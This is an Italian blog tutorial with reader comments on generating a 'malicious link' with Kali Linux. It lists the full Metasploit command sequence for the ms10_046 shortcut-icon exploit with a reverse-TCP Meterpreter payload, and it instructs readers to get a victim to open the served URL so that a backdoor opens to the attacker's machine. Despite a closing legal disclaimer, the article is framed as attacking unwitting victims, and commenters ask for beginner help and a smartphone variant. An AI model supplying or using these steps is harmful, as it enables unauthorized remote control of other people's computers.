Generare un link maligno con Kali Linux
Fino ad ora abbiamo discusso su vari metodi per creare backdoor, ma oggi andremo a vedere come generare un link maligno con Kali Linux; si tratta di un nuovo metodo che fino ad adesso non ne abbiamo parlato; esso consiste nel generale un codice maligno con Kali per poi farci cliccare sopra la vittima, che senza saperlo andrà ad aprire una comunicazione tra il suo computer e quello dell’attaccante. La backdoor non deve essere per forza un file, ma il più delle volte gli hacker (quelli più esperti) la camuffano molto bene e ce la fanno apparire come un link (nel nostro caso) o in altri modi molti ingegnosi. La probabilità di successo sta proprio nel saper studiare e progettare al meglio la dinamica dell’attacco, aggirando gli ostacoli con un pizzico di intelligenza e soprattutto di furbizia; se seguiamo questi suggerimenti riusciremo ad ottenere quasi sempre ciò che vogliamo. Ma ora passiamo al punto del giorno; come possiamo dar vita ad un link che, appena aperto, va a creare una backdoor in un PC remoto? Vi rispondo subito alla domanda, è abbastanza semplice; basta usufruire del nostro consueto sistema operativo per l’hacking e il cracking, ovvero Kali Linux e con qualche comando arriveremo a ciò di cui abbiamo bisogno. Senza perdere altro tempo, cominciamo!
Innanzitutto iniziamo aprendo un terminale digitando il comando “msfconsole” che andrà ad attivare la console di Metasploit Framework, che come avete avuto modo di vedere è uno dei principali tool che utilizziamo.
Quindi procediamo con una serie di comandi:
-use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
-set PAYLOAD windows/meterpreter/reverse_tcp
-set LHOST “indirizzo IP locale”
-set LPORT “porta locale”
-set SRVHOST “indirizzo IP locale”
-exploit
A questo punto il terminale vi indicherà i prossimi procedimenti da eseguire; in questo caso, dopo che ho digitato il comando “exploit”, mi compare nella terzultima riga la seguente dicitura: “Using URL: https://192.168.1.100:80/”; semplicemente dovremo copiare questo link e farlo aprire in qualche modo alla vittima; appena aperto si stabilirà una comunicazione tra il nostro computer e quello target.
Per qualsiasi chiarimento sui comandi a disposizione potete digitare nel terminale “help”.
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
Salve, posso sapere come si può ottenere l’ip locale e il numero della porta locale? So che può sembrare una domanda molto stupida, ma sono un principiante assoluto e mi sono appassionato a questo settore dell’informatica solo ora
Salve, Sono un appassionato di Cyber Security, Volevo sapere se è possibile Creare Un link Malevolo per Smartphone ?
Comunque complimenti, Siete magnifici
Salve, ne faremo una guida al più presto. Grazie.
Ciao Umberto, dammi più dettagli, il link che genera questo script può essere utilizzato da qualsiasi device…Giorgio